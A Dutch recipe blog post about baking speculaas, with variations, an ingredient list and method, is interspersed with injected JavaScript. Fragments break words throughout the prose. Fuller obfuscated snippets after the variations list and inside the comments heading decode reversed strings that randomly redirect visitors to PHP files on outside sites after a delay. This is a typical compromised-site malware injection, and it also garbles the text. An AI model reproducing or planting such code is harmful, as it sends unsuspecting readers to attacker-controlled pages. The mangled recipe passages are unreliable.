Speculaas maken doe je zo!

In mijn blog over Dille & Kamille liet ik jullie al weten dat ik zelf speculaas ging maken. Zodra de speculaas brokken en pepernoten de winkels in komen kan ik dit echt niet weerstaan! Van vroeger weet ik nog wel dat we zelf pepernoten gingen bakken, maar echt speculaasjes maken kan ik me niet herinneren. Ik kan nu al niet wachten op die heerlijke geur die zo uit de over gaat komen!

Als basis recept heb ik hier het recept van Dille & Kamille gebruikt, maar uiteraard heb ik er nog wel wat ingrediënten aan dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegd. Je kunt tegenwoordig ook hele handige kant-en-klaar bakmixen kopen. Altijd handig om in de kast te hebben staan.

Blijf oefenen!

De eerste keer dat ik  speculaas en koekjes bakte was een ware ramp. Het deeg bleef continue aan me deegroller plakken… Tips zijn nog steeds welkom! Maar eenmaal door te hebben dat het bestuiven van voldoende bloem op werkblad, deeg en roller wonderen doet is het dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toch gelukt een dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toonbaar, lekker koekje te produceren.

Facebook Tip!

Op Facebook kreeg ik een goede tip; bedankt!

‘ Leg een stukje folie op je plank en op het deeg. Je kunt het deeg zo goed bewerken zonder dat het aan de deegroller blijft plakken’.

Speculaas Recept | Viving

Speculaas, maar dan anders…

In dit recept heb ik een variatie tip dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegd met amandelspijs. Je kunt natuurlijk heel veel variaties maken met speculaas deeg:

 • Speculaasbrokken: rol het deeg uit in een plak van 1 cm hoog. Snijd het deeg in een rechthoek en leg op een bakplaat met bakpapier.
 • Speculaasletters: vorm het deeg in een letter en verwen iedereen met een speculaasletter in plaats van een chocolade letter.
 • Speculaascake: meng speculaas kruiden door de cakemix en maak een heerlijke speculaascake.
 • Speculaastaart met amandelspijs: Dit kun je goed maken in een ronde bakvorm. Bedek de bodem met het speculaasdeeg. Plaats hier vervolgens een laagje amandelspijs over en dek weer af met speculaasdeeg. Je kunt ter decoratie, en ook omdat het lekker is noten en amandelen dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toevoegen.

Genoeg variatie te bedenken op dit oud Hollandse koekrecept!

) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_links_target=”_self” mode=”horizontal” speed=”5000″ slides_per_view=”3″ audom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=”yes” hide_pagination_control=”” hide_prev_next_butdom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tons=”” partial_view=”” wrap=”yes” img_size=”300×300″]

Recept

Voorbereiding: 15 min.
Bereidingstijd: 45 min.

Ingredienten

 • 250 gram bloem
 • 150 gram koude boter
 • 140 gram donkere basterdsuiker
 • 1 theelepel sodiumbicarbonaat (baking soda)
 • 4 eetlepels melk
 • Amandelen of Amandel schaafsels
 • Variatie tip: 300 gram amandelspijs

Aan de slag!

 1. Meng de bloem, baking soda, basterdsuiker en speculaaskruiden in een kom.
 2. Voeg eerst de boter en daarna de melk toe en kneed alles tot een geheel.
 3. Laat het deeg een paar uur (liefst 1 hele nacht) in de koelkast opstijven. Het vergt dus enige voorbereiding en geduld...
 4. Bestuif de holling van de speculaasplankjes met bloem en druk het deeg stevig in de plankjes. Je kunt al het deeg wat uitsteekt wegsnijden.
 5. Klop de speculaasjes voorzichtig uit de vorm op een ingevette bakplaat. Je kunt eventueel bakpapier gebruiken. Houd voldoende ruimte tussen de koekjes in.
 6. Bestrooi de koekjes met de amandelen of amandelschaafsels. Je kunt dit natuurlijk ook door het deeg mengen.
 7. Als je geen speculaasplankjes hebt kun je ook andere vormpjes gebruiken. Zo kun je bijvoorbeeld kleine koek-huisjes maken die precies op de rand van een theemok blijven staan.
 8. Bak de speculaas ca. 15 minuten in een voorverwarmde oven van 170 graden.

Variatie Tip, voor nog lekkerdere speculaas!

Het enige ingredient wat je extra nodig hebt is 300 gram amandelspijs. Maak het deeg op basis van bovenstaande ingrediënten en steek met een kookring gelijke deeg rondjes van ongeveer 10 centimeter uit. maak bolletjes van het amandelspijs deeg en plaats deze tussen twee deeg rondjes. Gebruik een vorkje om de randen aan te duwen. Kluts een ei en bestrijk de koeken met een kwastje. Bak de koeken gedurende 25 minuten in een voorverwarmde oven. Laat de koeken goed afkoelen, eet smakelijk!

Review

 • Cijfer 10.0

User Rating

5 (2 Votes)

Summary

Score

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

Geen Reacties op "Speculaas maken <script>$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>doe je zo!"

  Plaats een reactie:

  Je emailadres wordt niet weergegeven.